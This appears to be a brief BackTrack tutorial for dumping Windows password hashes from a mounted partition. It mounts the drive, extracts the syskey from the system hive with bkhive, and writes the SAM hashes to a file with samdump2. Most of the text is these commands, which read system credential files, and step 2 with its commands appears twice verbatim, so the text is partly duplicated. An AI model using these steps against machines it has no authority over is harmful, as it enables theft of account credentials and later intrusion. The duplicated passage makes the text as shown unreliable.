1. Mount your windows partition substituting hda1 for whatever your windows partition is
# mount /dev/hda1 /mnt/XXX
2. If the syskey password is stored locally you need to extract it from the registry so you can decrypt the SAM. If syskey is setup to prompt for a password or the password is on a floppy, stop now and read the syskey documentation in this document for more information about syskey. If you installed windows to something other C:\WINDOWS please substitute the correct path. WARNING the path is case sensitive. The filenames of sam, security, and system are case sensitive. On my system these files are lowercase. I have come across other XP systems where they are uppercase. On the Vista system I have used the filenames are uppercase
BackTrack 2 users use the following:
# bkhive-linux /mnt/XXX/WINDOWS/system32/config/system syskey.txt
BackTrack 3 users use the following:
# bkhive /mnt/XXX/WINDOWS/system32/config/system syskey.txt
# samdump2 /mnt/XXX/WINDOWS/system32/config/sam syskey.txt >hash.txt
samdump2 will dump the SAM to the screen and the > character redirects the output to a file called hash.txt
you can also run samdump2 with the -o parameter to write the output to a file # samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/sam syskey.txt
# mount /dev/hda1 /mnt/XXX
2. If the syskey password is stored locally you need to extract it from the registry so you can decrypt the SAM. If syskey is setup to prompt for a password or the password is on a floppy, stop now and read the syskey documentation in this document for more information about syskey. If you installed windows to something other C:\WINDOWS please substitute the correct path. WARNING the path is case sensitive. The filenames of sam, security, and system are case sensitive. On my system these files are lowercase. I have come across other XP systems where they are uppercase. On the Vista system I have used the filenames are uppercase
BackTrack 2 users use the following:
# bkhive-linux /mnt/XXX/WINDOWS/system32/config/system syskey.txt
BackTrack 3 users use the following:
# bkhive /mnt/XXX/WINDOWS/system32/config/system syskey.txt
# samdump2 /mnt/XXX/WINDOWS/system32/config/sam syskey.txt >hash.txt
samdump2 will dump the SAM to the screen and the > character redirects the output to a file called hash.txt
you can also run samdump2 with the -o parameter to write the output to a file # samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/sam syskey.txt